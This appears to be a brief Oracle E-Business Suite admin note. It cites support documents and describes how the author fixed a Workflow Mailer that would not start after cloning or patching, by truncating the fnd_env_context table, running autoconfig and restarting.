MAIN REF: Workflow Mailer Won't Start In Cloned Environment (Doc ID 1953629.1) -- this for 12.1 but, it seems it is applicable for 12.2 as well.
Concurrent Processing - Purge Concurrent Request and/or Manager Data Program (FNDCPPUR) (Doc ID 104282.1)

Solution / You Said:

Update and FYI:
We fixed the issue using the following action plan;

shutdown apps tier
truncate the applsys.fnd_env_context
run autoconfig on db+appstier
restart

Actually its comes up now and then same issue appears sometimes after a lot of patching activities, note that -> not every time.. 
So, seems like some bug in EBS that confuses this GSM thing, and it just start on wrong filesystem.
Take care!